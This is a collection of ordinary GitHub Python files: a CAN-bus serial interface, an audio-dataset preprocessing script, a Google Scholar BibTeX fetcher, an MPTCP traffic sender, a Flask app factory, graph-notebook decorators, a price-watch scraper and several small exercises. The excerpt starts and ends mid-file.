+ i * 2], 16))\n        elif readStr[0] == 't':\n            # normal frame\n            canId = int(readStr[1:4], 16)\n            dlc = int(readStr[4])\n            for i in range(0, dlc):\n                frame.append(int(readStr[5 + i * 2:7 + i * 2], 16))\n        elif readStr[0] == 'r':\n            # remote frame\n            canId = int(readStr[1:4], 16)\n            dlc = int(readStr[4])\n            remote = True\n        elif readStr[0] == 'R':\n            # remote extended frame\n            canId = int(readStr[1:9], 16)\n            dlc = int(readStr[9])\n            extended = True\n            remote = True\n\n        if canId is not None:\n            msg = Message(arbitration_id=canId,\n                          is_extended_id=extended,\n                          timestamp=time.time(),   # Better than nothing...\n                          is_remote_frame=remote,\n                          dlc=dlc,\n                          data=frame)\n            return msg, False\n        return None, False\n\n    def send(self, msg, timeout=None):\n        if timeout != self.serialPortOrig.write_timeout:\n            self.serialPortOrig.write_timeout = timeout\n\n        if msg.is_remote_frame:\n            if msg.is_extended_id:\n                sendStr = \"R%08X%d\" % (msg.arbitration_id, msg.dlc)\n            else:\n                sendStr = \"r%03X%d\" % (msg.arbitration_id, msg.dlc)\n        else:\n            if msg.is_extended_id:\n                sendStr = \"T%08X%d\" % (msg.arbitration_id, msg.dlc)\n            else:\n                sendStr = \"t%03X%d\" % 
(msg.arbitration_id, msg.dlc)\n\n sendStr += \"\".join([\"%02X\" % b for b in msg.data])\n self.write(sendStr)\n\n def shutdown(self):\n self.close()\n self.serialPortOrig.close()\n\n def fileno(self):\n if hasattr(self.serialPortOrig, 'fileno'):\n return self.serialPortOrig.fileno()\n # Return an invalid file descriptor on Windows\n return -1\n","repo_name":"CanBusHack/cmap","sub_path":"venv/Lib/site-packages/can/interfaces/slcan.py","file_name":"slcan.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"86"} +{"seq_id":"4557475679","text":"\"\"\"\nFilreader enriching files with synonyms out of wordnet\n\"\"\"\n\nimport sys\nfrom os import listdir, rename, makedirs, remove\nfrom os.path import join, isfile, dirname, exists\nimport shutil\nfrom pydub import AudioSegment\nimport subprocess\n\n__author__ = \"kaufmann-a@hotmail.ch\"\ntemp_path = \"./temp\"\n\n#Beispiel ffmpeg mp4 streams auftrennen und zusammenmergen: ffmpeg -i test.mp4 -filter_complex \"[0:1][0:2]amerge=inputs=2[ab]\" -map [ab] 1.wav\n#Hier wurden streams 2 und 3 gemerged\ndef normalize(file, destination, db = -20.0):\n def match_target_amplitude(sound, target_dBFS):\n change_in_dBFS = target_dBFS - sound.dBFS\n return sound.apply_gain(change_in_dBFS)\n\n sound = AudioSegment.from_file(file, \"wav\")\n normalized_sound = match_target_amplitude(sound, db)\n normalized_sound.export(destination, format=\"wav\")\n\ndef calculate_ratio_instr_vocs(instr, voc):\n instrlevel = AudioSegment.from_file(instr, \"wav\").dBFS\n voclevel = AudioSegment.from_file(voc, \"wav\").dBFS\n targetDB_VOC = -20 + (-20 * (voclevel / instrlevel - 1))\n return targetDB_VOC\n\ndef copy_files(sourcedir, outputdir, maxCopy, override):\n src_files= listdir(sourcedir)\n for file in src_files:\n if maxCopy == 0: break\n old_file = join(sourcedir, file)\n new_folder = join(outputdir, file)\n new_songname_instr = 'instrumental_' + file\n new_songname_vocals = 'vocals_' + file\n new_songfile_instr = join(new_folder, new_songname_instr)\n new_songfile_vocals = join(new_folder, new_songname_vocals)\n if not exists(new_folder): makedirs(new_folder)\n if exists(new_songfile_instr) and override: remove(new_songfile_instr)\n if exists(new_songfile_vocals) and override: remove(new_songfile_vocals)\n if (not exists(new_songfile_vocals) and not exists(new_songfile_instr)) or override:\n cmd = \"ffmpeg -i \\\"\" + old_file + \"\\\" -filter_complex \\\"[0:a]channelsplit=channel_layout=stereo[l][r]\\\" -map [l] -ac 2 -ar 44100 \\\"\" + join(temp_path, new_songname_instr) + \"\\\" -map [r] -ac 2 -ar 44100 \\\"\" + join(temp_path, new_songname_vocals) + \"\\\"\"\n subprocess.check_call(cmd, shell=True) # cwd = cwd\n\n vocal_volume = calculate_ratio_instr_vocs(join(temp_path, new_songname_instr), join(temp_path, new_songname_vocals))\n\n normalize(join(temp_path, new_songname_instr), new_songfile_instr, -20)\n normalize(join(temp_path, new_songname_vocals), new_songfile_vocals, vocal_volume)\n print(\"\\n\" + new_songname_vocals + \" and \" + new_songname_instr + \" converted\" + \"\\n\")\n remove(join(temp_path, new_songname_vocals))\n remove(join(temp_path, new_songname_instr))\n maxCopy -= 1\n\nif __name__ == '__main__':\n #Call script with scriptname maxfiles override\n #Example call: musdb18_fileprocessing.py 20 True\n #This will convert the first twenty files in the source dir and override already existing files in the outputdir\n\n maxCopy = -1\n override = True\n unmix_server = 
'//192.168.1.29/unmix-server'\n\n print('Argument List:', str(sys.argv))\n\n if sys.argv.__len__() == 2:\n unmix_server = sys.argv[1]\n\n sources = unmix_server + \"/1_sources/MIR-1K/UndividedWavfile\"\n destination = unmix_server + \"/2_prepared/MIR-1K\"\n if not exists(temp_path): makedirs(temp_path)\n\n copy_files(sources, destination, maxCopy, override)\n\n print('Finished converting')\n\n","repo_name":"unmix-io/tools","sub_path":"collection-processing/MIR-1K_fileprocessing/mir-1k_fileprocessing.py","file_name":"mir-1k_fileprocessing.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"24872699993","text":"import numpy as np\n\ndef lsq(X, Y, b0=True):\n \"\"\"Least squares solution directly from numpy.\n\n :param X: Feature matrix with features in columns, examples (N) in rows.\n :param Y: Label vector (or matrix)\n :param b0: If ``True``, include intercept, otherwise don't.\n :type b0: :obj:`bool`\n :returns: Dictonary labeled b\\* where \\* is 0 for intercept and 1...N for coefficients.\n :rtype: :obj:`dict`\n\n \"\"\"\n if b0:\n b = np.linalg.lstsq(np.r_['1,2', np.ones((X.shape[0], 1)), X], Y)[0]\n else:\n b = np.linalg.lstsq(X, Y)[0]\n return dict(\n zip(['b{}'.format(i) for i in np.arange(b.shape[0]) + (1 - b0)], b))\n","repo_name":"betaplane/cezanne","sub_path":"python/linear/numpy.py","file_name":"numpy.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"69814447324","text":"# Hackerrank problem Introduction to sets\n\ndef average(array):\n st = set(array)\n s = sum(st)\n l = len(st)\n avg = s/l\n return avg\n\nif __name__ == '__main__':\n n = int(input())\n arr = list(map(int, input().split()))\n result = average(arr)\n print(result)","repo_name":"krishna-rawat-hp/HackerRank-solution-python","sub_path":"introduction_to_sets.py","file_name":"introduction_to_sets.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71175704285","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 12 20:33:02 2021\r\n\r\n@author: Doğukan Bozkurt\r\n\"\"\"\r\nimport math\r\n#Forier series funcs.\r\n\r\na_1=int(input(\"Please enter a value for a1: \"))\r\nb_1=int(input(\"Please enter a value for b1: \"))\r\n#Teta will be converted Degree to Radian\r\nTeta_1=(int(input(\"Please enter a value for Teta_1: \")))*math.pi/180\r\nt=7\r\nprint(\"\\na_1: {0}\\nb_1: {1}\\nTeta_1: {2}\".format(a_1,b_1,Teta_1))\r\n\r\nA_1= math.sqrt(a_1**2+b_1**2)\r\n\r\ng_1=A_1*math.cos(math.pi/4*t+Teta_1)\r\n\r\nprint(\"g_1({0})= {1}\".format(t,g_1))\r\n","repo_name":"dkbozkurt/OOP_Python_Course_University","sub_path":"Exp3/Exp3_q1.py","file_name":"Exp3_q1.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15900517036","text":"from __future__ import print_function\n\n\ntry:\n # python 2\n from urllib2 import Request, urlopen, quote\nexcept ImportError:\n # python 3\n from urllib.request import Request, urlopen, quote\n\ntry:\n # python 2\n from htmlentitydefs import name2codepoint\nexcept ImportError:\n # python 3\n from html.entities import name2codepoint\n\nimport re\nimport hashlib\nimport random\nimport sys\nimport os\nimport subprocess\nimport optparse\nimport logging\n\n\n# fake google id (looks like it 
is a 16 elements hex)\nrand_str = str(random.random()).encode('utf8')\ngoogle_id = hashlib.md5(rand_str).hexdigest()[:16]\n\nGOOGLE_SCHOLAR_URL = \"http://scholar.google.com\"\n# the cookie looks normally like:\n# 'Cookie' : 'GSP=ID=%s:CF=4' % google_id }\n# where CF is the format (e.g. bibtex). since we don't know the format yet, we\n# have to append it later\nHEADERS = {'User-Agent': 'Mozilla/5.0',\n 'Cookie': 'GSP=ID=%s' % google_id}\n\nFORMAT_BIBTEX = 4\nFORMAT_ENDNOTE = 3\nFORMAT_REFMAN = 2\nFORMAT_WENXIANWANG = 5\n\n\ndef query(searchstr, outformat=FORMAT_BIBTEX, allresults=False):\n \"\"\"Query google scholar.\n This method queries google scholar and returns a list of citations.\n Parameters\n ----------\n searchstr : str\n the query\n outformat : int, optional\n the output format of the citations. Default is bibtex.\n allresults : bool, optional\n return all results or only the first (i.e. best one)\n Returns\n -------\n result : list of strings\n the list with citations\n \"\"\"\n logging.debug(\"Query: {sstring}\".format(sstring=searchstr))\n searchstr = '/scholar?q='+quote(searchstr)\n url = GOOGLE_SCHOLAR_URL + searchstr\n header = HEADERS\n header['Cookie'] = header['Cookie'] + \":CF=%d\" % outformat\n request = Request(url, headers=header)\n response = urlopen(request)\n html = response.read()\n html = html.decode('utf8')\n # grab the links\n tmp = get_links(html, outformat)\n\n # follow the bibtex links to get the bibtex entries\n result = list()\n if not allresults:\n tmp = tmp[:1]\n for link in tmp:\n url = GOOGLE_SCHOLAR_URL+link\n request = Request(url, headers=header)\n response = urlopen(request)\n bib = response.read()\n bib = bib.decode('utf8')\n result.append(bib)\n return result\n\n\ndef get_links(html, outformat):\n \"\"\"Return a list of reference links from the html.\"\"\"\n if outformat == FORMAT_BIBTEX:\n refre = re.compile(r' len(x)-1:\n count = count + (j - i) // 2\n i = j\n break\n count = count + (j-i)//2\n i = j\nprint(count)\n","repo_name":"Abadonna13/GB","sub_path":"Python_seminars/Task_43.py","file_name":"Task_43.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"15580014184","text":"\"\"\"\nSender python implementation sending random traffic to receiver.\nCredit to Wen-Chien Chen and Kevin Han which implemented this:\nhttps://bitbucket.org/iamtheone188/cs244-2015-wckh-mptcp/src/master/\nhttps://reproducingnetworkresearch.wordpress.com/2015/05/31/cs-244-15-reproducing-the-3gwifi-application-level-latency-results-in-mptcp/\n\"\"\"\nfrom argparse import ArgumentParser\nfrom struct import pack\nfrom time import sleep\nimport socket\nimport sys\nfrom monotonic import monotonic # Monotonic time to avoid issues from NTP adjustments\n\n# Parse arguments\nparser = ArgumentParser(description=\"Sender for MPTCP latency measurements\")\nparser.add_argument('--server', '-s', help=\"IP address of receiver\", required=True)\nparser.add_argument('--port', '-p', type=int, help=\"Port of receiver\", required=True)\nparser.add_argument('--size', type=int, help=\"Size of each packet in bytes\", default=1428)\nparser.add_argument('--time', '-t', type=int, help=\"Number of seconds to send for\", default=600)\nparser.add_argument('--bufsize', type=int, help=\"Send buffer size in KB\", default=200)\nparser.add_argument('--outfile', '-o', help=\"Name of output file\", required=True)\nargs = parser.parse_args()\n\nformat_string = \"i%dx\" % (args.size-4) # 4 byte 
counter\n\n\ndef main():\n try:\n f = open(args.outfile, 'w')\n f.write('pkt_id\\tsnd_t [s]\\tpayload [bytes]\\n')\n except IOError:\n sys.stderr.write(\"Could not open output file for writing\\n\")\n sys.exit(1)\n\n try:\n s = socket.socket(socket.AF_INET)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, args.bufsize / 2 * 1000) # The kernel doubles the value set here\n s.connect((args.server, args.port))\n except socket.error:\n sys.stderr.write(\"Could not connect to receiver\\n\")\n sys.exit(1)\n\n print(\"Connected to receiver\")\n sleep(1) # Wait in case receiver needs to do some initial processing\n\n print(\"Starting packet flow\")\n start_time = monotonic()\n counter = 1\n while monotonic() - start_time < args.time:\n packet = pack(format_string, counter)\n s.send(packet)\n timestamp = monotonic()\n f.write(\"{}\\t{}\\t{}\\n\".format(counter, timestamp, args.size))\n counter += 1\n # sleep(1)\n\n print(\"Shutting down\")\n s.close()\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"phyratokar/MPTCP-Mininet-Benchmark","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"11465236964","text":"from heapq import heappush, heappop\nimport sys\ninput = sys.stdin.readline\nn, m = map(int, input().split())\n\nd = [-1 for _ in range(n + 1)]\nadj = [[] for _ in range(n + 1)]\n\nfor l in range(m):\n x, y, z = map(int, input().split())\n adj[x].append((y, z))\n adj[y].append((x, z))\n\nq = [(0, 1)]\nwhile q:\n dist, node = heappop(q)\n if d[node] != -1:\n continue\n d[node] = dist\n for dest, add in adj[node]:\n heappush(q, (dist + add, dest))\n\nfor l in range(1, n + 1):\n print(d[l])\n","repo_name":"python3lover/alphaprojects","sub_path":"activity_solutions/algorithms/dijkstras.py","file_name":"dijkstras.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"26534772934","text":"# 参考[OlivaDiceDocs](https://oliva.dicer.wiki/userdoc)实现的nonebot2骰娘插件\nimport contextlib\nimport random\nfrom typing import Optional\nimport diro\nfrom .constant import *\n\n\ndef to_circled(num: int, c: int) -> str:\n if num < 1 or num > 10:\n return \"?\"\n return str(num) if num < c else chr(0xA2) + chr(0xD8 + num)\n\n\ndef roll_success_level(res: int, rate: int, rule: int = 0) -> int:\n \"\"\"\n 成功等级, 0-大失败,1-失败,2-成功,3-困难成功,4-极难成功,5-大成功\n\n Args:\n res: 骰子结果\n rate: 检测值\n rule: 规则\n \"\"\"\n if rule == 0:\n return _roll_success_level_rule0(res, rate)\n elif rule == 1:\n return _roll_success_level_rule1(res, rate)\n elif rule == 2:\n return _roll_success_level_rule2(res, rate)\n elif rule == 3:\n return _roll_success_level_rule3(res, rate)\n elif rule == 4:\n return _roll_success_level_rule4(res, rate)\n elif rule == 5:\n return _roll_success_level_rule5(res, rate)\n elif rule == 6:\n if res > rate:\n return 0 if res == 100 or res % 11 == 0 else 1\n else:\n return 5 if res == 1 or res % 11 == 0 else 2\n else:\n return -1\n\n\ndef _roll_success_level_rule5(res, rate):\n if res >= 99:\n return 0\n if res <= 2 and res < rate / 10:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if rate >= 50 or res < 96 else 0\n\n\ndef _roll_success_level_rule4(res, rate):\n if res == 100:\n return 0\n if res <= 5 and res <= rate / 10:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n 
return 3\n if res <= rate:\n return 2\n return 1 if rate >= 50 or res < 96 + rate / 10 else 0\n\n\ndef _roll_success_level_rule3(res, rate):\n if res >= 96:\n return 0\n if res <= 5:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n return 2 if res <= rate else 1\n\n\ndef _roll_success_level_rule2(res, rate):\n if res == 100:\n return 0\n if res <= 5 and res <= rate:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if res < 96 else 0\n\n\ndef _roll_success_level_rule1(res, rate):\n if res == 100:\n return 0\n if res == 1 or (res <= 5 and rate >= 50):\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if rate >= 50 or res < 96 else 0\n\n\ndef _roll_success_level_rule0(res, rate):\n if res == 100:\n return 0\n if res == 1:\n return 5\n if res <= rate / 5:\n return 4\n if res <= rate / 2:\n return 3\n if res <= rate:\n return 2\n return 1 if rate >= 50 or res < 96 else 0\n\n\ndef long_insane():\n sym_res = random.randint(1, 10)\n res = f\"调查员的疯狂发作-总结症状:1D10={sym_res}\\n症状: \\n\"\n fmap = {\"dur\" : f\"1D10={random.randint(1, 10)}\"}\n j = random.randint(1, 100)\n if sym_res == 10:\n fmap[\"detail_roll\"] = f\"1D100={j}\"\n fmap[\"detail\"] = Panic[j]\n elif sym_res == 9:\n fmap[\"detail_roll\"] = f\"1D100={j}\"\n fmap[\"detail\"] = Fear[j]\n return f\"{res}{LongInsanity[sym_res].format(**fmap)}\"\n\n\ndef temp_insane():\n sym_res = random.randint(1, 10)\n res = f\"调查员的疯狂发作-临时症状:1D10={sym_res}\\n症状: \\n\"\n fmap = {\"dur\" : f\"1D10={random.randint(1, 10)}\"}\n j = random.randint(1, 100)\n if sym_res == 10:\n fmap[\"detail_roll\"] = f\"1D100={j}\"\n fmap[\"detail\"] = Panic[j]\n elif sym_res == 9:\n fmap[\"detail_roll\"] = f\"1D100={j}\"\n fmap[\"detail\"] = Fear[j]\n return f\"{res}{TempInsanity[sym_res].format(**fmap)}\"\n\ndef dhr(t, o):\n return 100 if t == 0 and o == 0 else t * 10 + o\n\ndef st():\n result = random.randint(1, 20)\n if result < 4:\n rstr = \"右腿\"\n elif result < 7:\n rstr = \"左腿\"\n elif result < 11:\n rstr = \"腹部\"\n elif result < 16:\n rstr = \"胸部\"\n elif result < 18:\n rstr = \"右臂\"\n elif result < 20:\n rstr = \"左臂\"\n else:\n rstr = \"头部\"\n return f\"D20={result}: 命中了{rstr}\"\n\n\ndef en(arg: int) -> str:\n check = random.randint(1, 100)\n if check <= arg and check <= 95:\n return f\"判定值{check},判定失败,技能无成长。\"\n plus = random.randint(1, 10)\n r = f\"判定值1D100={check},判定成功,技能成长{arg}+{plus}={arg + plus}\"\n return r + \"\\n温馨提示:如果技能提高到90%或更高,增加2D6理智点数。\"\n\n\ndef expr(d: diro.Diro, anum: Optional[int], rule: int = 0) -> str:\n d.roll()\n result = d.calc()\n s = f\"{d.expr()}={(d.detail_expr())}={result}\"\n if anum:\n sl = roll_success_level(result, anum, rule)\n s += f\"\\n检定值 {anum}, {SuccessLevel[sl]}\"\n return s\n\n\ndef rd0(pattern: str, anum: Optional[int] = None, rule: int = 0) -> str:\n d_str = pattern.lower().split(\"#\")\n rd = diro.parse(d_str.pop(0))\n time = 1\n if d_str:\n with contextlib.suppress(ValueError):\n time = int(d_str[0])\n r = expr(rd, anum, rule)\n for _ in range(time - 1):\n r += \"\\n\"\n r += expr(rd, anum)\n return r\n","repo_name":"RF-Tar-Railt/RaianBot","sub_path":"library/dice/rd.py","file_name":"rd.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"86"} +{"seq_id":"16071633317","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import 
LoginManager\nfrom flask_migrate import Migrate\nfrom kakeibosan.config import config\n\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n app = Flask(__name__, static_url_path='/kakeibosan/static')\n app.config.from_object(config)\n db.init_app(app)\n\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.login_view = 'auth.login'\n login_manager.login_message_category = 'info'\n\n with app.app_context():\n from kakeibosan.models import User\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(user_id)\n\n migrate = Migrate(app, db)\n\n from kakeibosan.views import (\n auth, dashboard, records, settings, settings_account, settings_fixedcost, settings_category,\n )\n\n page_modules = [\n auth.bp,\n dashboard.bp,\n records.bp,\n settings.bp,\n settings_account.bp,\n settings_fixedcost.bp,\n settings_category.bp,\n ]\n\n for bp in page_modules:\n app.register_blueprint(bp, url_prefix='/kakeibosan')\n\n return app\n","repo_name":"showgayaki/kakeibosan","sub_path":"kakeibosan/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31935139085","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\n\nimport sys, os\n\n__version__ = '0.1'\n\nsetup(name='whois',\n\tversion=__version__,\n\tdescription=\"The Whois client, which is developed in Python language, retrieves domain information from the server.\",\n\tclassifiers=[\n\t\t\"License :: OSI Approved :: MIT License\",\n\t\t\"Operating System :: POSIX\",\n\t\t\"Environment :: Console\",\n\t\t\"Programming Language :: Python\",\n\t\t\"Topic :: Internet\",\n\t\t\"Topic :: Software Development :: Libraries :: Python Modules\",\n\t], \n\tkeywords='whois',\n\tauthor='Larry Kim',\n\tauthor_email='admin@relip.org',\n\turl='http://github.com/relip/python-whois',\n\tlicense='MIT',\n\tpackages=['whois'],\n\tpackage_data={\"whois\": [\"tlds/*\", \"nics/*\"]},\n)\n","repo_name":"relip/python-whois","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"88"} +{"seq_id":"23802913940","text":"import functools\nimport json\nimport re\nimport traceback\n\nfrom IPython.core.display import HTML, display, clear_output\n\nimport ipywidgets as widgets\nfrom graph_notebook.visualization.template_retriever import retrieve_template\nfrom graph_notebook.neptune.client import NEPTUNE_ANALYTICS_SERVICE_NAME\nfrom gremlin_python.driver.protocol import GremlinServerError\nfrom requests import HTTPError\n\nerror_template = retrieve_template(\"error.html\")\n\ncheck_if_access_regex = re.compile(r'^[a-zA-Z0-9_]+((\\[\\'.*?\\'\\])|(\\[\\\".*?\\\"\\])|(\\[.*?\\]))+$')\nvar_name_regex = re.compile(r'^[^\\[]*')\n\n\ndef get_variable_injection_name_and_indices(raw_var: str, keys_are_str: bool = True):\n # get the name of the dict\n var_name = var_name_regex.match(raw_var).group(0)\n # get the rest of the string, containing all the nested keys\n keys_raw = raw_var[len(var_name):len(raw_var)]\n # remove all quotes before we split to keys\n keys_raw = keys_raw.replace('\"', \"\").replace(\"'\", \"\")\n keys_list = keys_raw[1:(len(keys_raw) - 1)].split(\"][\")\n\n if not keys_are_str:\n keys_list = [int(x) for x in keys_raw[1:(len(keys_raw) - 1)].split(\"][\")]\n\n return var_name, keys_list\n\n\ndef get_variable_injection_value(raw_var: 
str, local_ns: dict):\n # check if var string is trying to access a dict\n if re.match(check_if_access_regex, raw_var):\n var_name, keys_list = get_variable_injection_name_and_indices(raw_var)\n # outer try/except statement in use_magic_variable should catch case where dict_name isn't in local_ns\n current_value = local_ns[var_name]\n # loop through the nested keys/values until we get the final value\n for key in keys_list:\n if isinstance(current_value, dict):\n current_value = current_value[key]\n else: # for list/tuple, try to convert to int first\n try:\n index_key = int(key)\n except ValueError:\n print(\"Error occurred during variable injection: Attempted to access tuple/list with str index. \"\n \"Please check your query.\")\n return\n current_value = current_value[index_key]\n final_value = json.dumps(current_value) if type(current_value) is dict else str(current_value)\n return final_value\n else:\n final_value = local_ns[raw_var]\n if type(final_value) is dict:\n return json.dumps(final_value)\n else:\n return str(final_value)\n\n\ndef display_exceptions(func):\n @functools.wraps(func)\n def do_display_exceptions(*args, **kwargs):\n try:\n show_traceback = kwargs['local_ns']['graph_notebook_show_traceback']\n except KeyError:\n show_traceback = False\n clear_output()\n tab = widgets.Tab()\n\n server_error = False\n try:\n return func(*args, **kwargs)\n except KeyboardInterrupt:\n print('Keyboard interrupt detected.')\n return # we must return since we have halted the kernel interrupt here. Otherwise the interrupt will not work.\n except HTTPError as http_ex:\n caught_ex = http_ex\n raw_html = http_ex_to_html(http_ex)\n server_error = True\n except GremlinServerError as gremlin_ex:\n caught_ex = gremlin_ex\n raw_html = gremlin_server_error_to_html(gremlin_ex)\n server_error = True\n except Exception as e:\n if show_traceback:\n caught_ex = traceback.format_exception(e)\n traceback.print_exception(e)\n else:\n caught_ex = e\n raw_html = exception_to_html(e)\n\n if 'local_ns' in kwargs:\n kwargs['local_ns']['graph_notebook_error'] = caught_ex\n\n if server_error or not show_traceback:\n html = HTML(raw_html)\n html_output = widgets.Output(layout={'overflow': 'scroll'})\n with html_output:\n display(html)\n tab.children = [html_output]\n tab.set_title(0, 'Error')\n display(tab)\n\n return do_display_exceptions\n\n\ndef magic_variables(func):\n @functools.wraps(func)\n def use_magic_variables(*args, **kwargs):\n local_ns = kwargs['local_ns']\n args = list(args)\n variable_regex = re.compile(r'\\$\\{(.*?)}')\n try:\n # If we want to use custom line magic variables with the same syntax:\n # line_string = args[1]\n # args[1] = variable_regex.sub(lambda m: str(local_ns[m.group(1)]), line_string)\n if len(args) > 2:\n cell_string = args[2]\n args[2] = variable_regex.sub(\n lambda m: get_variable_injection_value(raw_var=m.group(1), local_ns=local_ns), cell_string)\n return func(*args, **kwargs)\n except KeyError as key_error:\n print(f'Terminated magic due to undefined variable: {key_error}')\n return\n\n return use_magic_variables\n\n\ndef neptune_db_only(func):\n @functools.wraps(func)\n def check_neptune_db(*args, **kwargs):\n self = args[0]\n if not hasattr(self.graph_notebook_config, 'neptune_service'):\n return func(*args, **kwargs)\n else:\n service_type = self.graph_notebook_config.neptune_service\n if service_type == NEPTUNE_ANALYTICS_SERVICE_NAME:\n print(f'This magic is unavailable for Neptune Analytics.')\n return\n else:\n return func(*args, **kwargs)\n\n return 
check_neptune_db\n\n\ndef http_ex_to_html(http_ex: HTTPError):\n try:\n error = json.loads(http_ex.response.content.decode('utf-8'))\n content = json.dumps(error, indent=2)\n except Exception:\n content = {\n 'error': http_ex\n }\n error_html = error_template.render(error=content)\n return error_html\n\n\ndef exception_to_html(ex):\n content = {\n 'error': ex\n }\n error_html = error_template.render(error=content)\n return error_html\n\n\ndef gremlin_server_error_to_html(gremlin_ex: GremlinServerError):\n try:\n error = json.loads(gremlin_ex.args[0][5:]) # remove the leading error code.\n content = json.dumps(error, indent=2)\n except Exception:\n content = {\n 'error': gremlin_ex\n }\n error_html = error_template.render(error=content)\n return error_html\n","repo_name":"aws/graph-notebook","sub_path":"src/graph_notebook/decorators/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":6439,"program_lang":"python","lang":"en","doc_type":"code","stars":636,"dataset":"github-code","pt":"88"} +{"seq_id":"23416834303","text":"# https://www.hackerrank.com/challenges/python-string-formatting/problem\n\n__author__ = \"Shovra Das\"\n\n\ndef print_formatted(number):\n w = len('{:b}'.format(number))\n # your code goes here\n for i in range(1, number+1):\n d = '{:d}'.format(i)\n o = '{:o}'.format(i)\n h = '{:X}'.format(i)\n b = '{:b}'.format(i)\n print(d.rjust(w), o.rjust(w), h.rjust(w), b.rjust(w))\n\n \nif __name__ == '__main__':\n n = int(input())\n print_formatted(n)","repo_name":"shovradas/competitive-programming","sub_path":"hackerrank/python/python-string-formatting.py","file_name":"python-string-formatting.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"88"} +{"seq_id":"34191131727","text":"# This short script was inspired by this article on webscraping below\n# https://www.bitcoininsider.org/article/50706/building-web-scraper-start-finish\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nurl = 'https://www.bowflex.com/selecttech/552/100131.html'\nresponse = requests.get(url, timeout=5)\ncontent = BeautifulSoup(response.content,\"html.parser\")\n\nhtmlContentFound = content.findAll('button', attrs={\"class\": \"add-to-cart\"})\ncurrentContent = htmlContentFound[0]\ncurrentContent = str(currentContent).replace(\"\\\"\",\"'\")\n\nsoldOutContent = \"\"\n\nif soldOutContent == currentContent:\n message = Mail(\n from_email='',\n to_emails='',\n subject='Weight Prices Update',\n html_content='There has been a change in the price of Weights')\n try:\n sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n except Exception as e:\n print(e.message)\nelse:\n print('still sold out')\n\n\n","repo_name":"niss3n/webscraper","sub_path":"webscaper.py","file_name":"webscaper.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"6650131693","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 24 16:41:24 2017\n\n@author: applesauce\n\nhttps://www.pyimagesearch.com/2014/09/01/build-kick-ass-mobile-document-scanner-just-5-minutes/\n\"\"\"\n\nimport numpy as np\nimport cv2\n\ndef order_points(pts):\n\trect = np.zeros((4, 2), dtype = \"float32\")\n\ts = pts.sum(axis 
